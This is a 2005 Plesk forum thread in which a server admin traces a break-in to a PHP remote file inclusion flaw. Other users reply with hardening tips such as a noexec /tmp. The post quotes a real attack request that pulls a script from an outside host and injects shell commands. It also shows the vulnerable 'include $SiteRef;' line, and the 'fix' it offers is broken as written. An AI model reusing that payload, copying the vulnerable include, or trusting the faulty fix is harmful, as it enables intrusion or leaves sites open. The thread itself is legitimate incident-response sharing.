1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice
  3. Dear Pleskians, I really hope that you will share your opinion in this Special topic for chatter about Plesk in the Clouds. Thank you!
    Dismiss Notice

Catching a Hacker

Discussion in 'Plesk for Linux - 8.x and Older' started by gromett, Jun 26, 2005.

  1. gromett

    gromett Guest

    I am happy to say that since moving on to Plesk attacks and attempts on my servers have been greatly reduced. The only ones I get now are the cross server scripting ones. Currently I just monitor the /tmp and /var/tmp directory for suspicious files every minute which lets me know when one is in progress. What follows is how I managed to track down how it happened so I could fix the clients dodgy script. I am posting this to help others who may not have time or knowledge to do so.

    1) I went to /var/tmp and moved all files to /root/hack for later perusal
    2) Did a ps aux to get the process id's and file names of the scripts being run.
    apache 29836 0.0 0.0 864 184 ttyp0 S 19:32 0:00 ./ssh-scan 100
    These had been created by a shell called /.x
    3) Did a netstat -lvanp to find out the remote IP of the attacker.
    tcp 0 0 ESTABLISHED 7862/x
    4) Hackers IP is now to find out which script was responsible for the breach
    5) used this find command to check all log files
    find /home/httpd/vhosts/ -name access_log -print -exec grep "" {} \;
    6) From this I could see the site name (modified)
    cat /home/httpd/vhosts/thedomain.com/statistics/logs/access_log | grep "" >/root/hack/access_log

    Here is a sample log entry
    /eolaud.php?SiteRef=http://www.virama.com/net.txt?&cmd=cd%20/var/spool/samba;mkdir%20.ro HTTP/1.0" 200 9623 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)"

    The script was is called eolaud.php
    I had a look at this script and it had 1 line of php code in it.
    include $SiteRef;

    You can see that by passing ?SiteRef=......
    You could include a file or script from another site.

    I changed this script to the following and notified the client
    if (eregi("http",$SiteRef)) {
    include $SiteRef;

    If a remote address is now entered it blanks the variable.

    In addition to this I have contacted the 4 hosts that were used by the hacker including the
    the IP owner for the hacker and the site were he had his hacking tools hosted.
    Hopefully he will be shut down. I have offered all the forensic evidence to the providers if they want to bring the authorities in.

    I am updating my checking scripts to include an hourly scan of all access_logs looking for /var/tmp and /tmp

    I hope this info helps.

    Regards Karl
  2. imiles

    imiles Guest


    Congratulations with your "catch" and thanks for sharing this with us.

    Just one extra question: when you say that you monitor /tmp and /var/tmp every minute, what are you actually doing and looking for?

  3. Luckiestlee

    Luckiestlee Guest

    thx for sharing the info Karl.

    i have quite a similiar attach and it's full my bandwitdh.

    but now instead monitoring my /var/tmp and /tmp , i made a personal partion to /tmp and i loaded it with noexec, and nosuid .
    i also change mode to wget, c**, gcc** to 600 (root only access) and scan through my home/httpd/vhost for unusual file and expesially file that own by apache and world writeable when it's all gone, my server is normal again.